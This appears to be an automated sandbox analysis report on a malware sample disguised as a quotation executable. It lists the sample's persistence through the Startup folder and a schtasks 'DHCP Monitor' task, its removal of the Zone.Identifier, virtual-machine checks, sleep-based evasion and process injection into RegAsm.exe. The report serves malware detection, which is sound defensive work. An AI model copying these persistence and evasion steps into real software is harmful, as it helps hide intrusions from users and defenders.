Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 18.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 18.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	File created: C:\Users\user\AppData\Roaming\5thncv			Jump to dropped file
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe			Jump to dropped file

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File created: C:\Users\user\AppData\Roaming\5thncv

Jump to dropped file

Boot Survival:

Drops PE files to the startup folder

Show sources

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp21A1.tmp'

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe

Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File opened: C:\Users\user\AppData\Roaming\5thncv:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Window / User API: threadDelayed 396	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Window / User API: threadDelayed 2028	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 5626	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 3986	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: foregroundWindowGot 828	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Window / User API: threadDelayed 1230	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe TID: 6624	Thread sleep time: -40560s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7084	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe TID: 7044	Thread sleep count: 247 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe TID: 6992	Thread sleep count: 1230 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6212	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7012	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: RegAsm.exe, 00000004.00000002.515160362.0000000007120000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000004.00000002.515160362.0000000007120000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe, 00000004.00000002.515160362.0000000007120000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000004.00000003.329460319.00000000016A3000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegAsm.exe, 00000004.00000002.515160362.0000000007120000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059C01CB mov eax, dword ptr fs:[00000030h]	0_2_059C01CB
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059C1D7F mov eax, dword ptr fs:[00000030h]	0_2_059C1D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059C1D7F mov eax, dword ptr fs:[00000030h]	0_2_059C1D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059C00AD mov ecx, dword ptr fs:[00000030h]	0_2_059C00AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059C00AD mov eax, dword ptr fs:[00000030h]	0_2_059C00AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059C1C2B mov eax, dword ptr fs:[00000030h]	0_2_059C1C2B
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059D00AD mov ecx, dword ptr fs:[00000030h]	0_2_059D00AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059D00AD mov eax, dword ptr fs:[00000030h]	0_2_059D00AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_059D01CB mov eax, dword ptr fs:[00000030h]	0_2_059D01CB
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057C1D7F mov eax, dword ptr fs:[00000030h]	5_2_057C1D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057C1D7F mov eax, dword ptr fs:[00000030h]	5_2_057C1D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057C01CB mov eax, dword ptr fs:[00000030h]	5_2_057C01CB
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057C1C2B mov eax, dword ptr fs:[00000030h]	5_2_057C1C2B
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057C00AD mov ecx, dword ptr fs:[00000030h]	5_2_057C00AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057C00AD mov eax, dword ptr fs:[00000030h]	5_2_057C00AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057D01CB mov eax, dword ptr fs:[00000030h]	5_2_057D01CB
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057D00AD mov ecx, dword ptr fs:[00000030h]	5_2_057D00AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 5_2_057D00AD mov eax, dword ptr fs:[00000030h]	5_2_057D00AD

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 110B008			Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F78008			Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
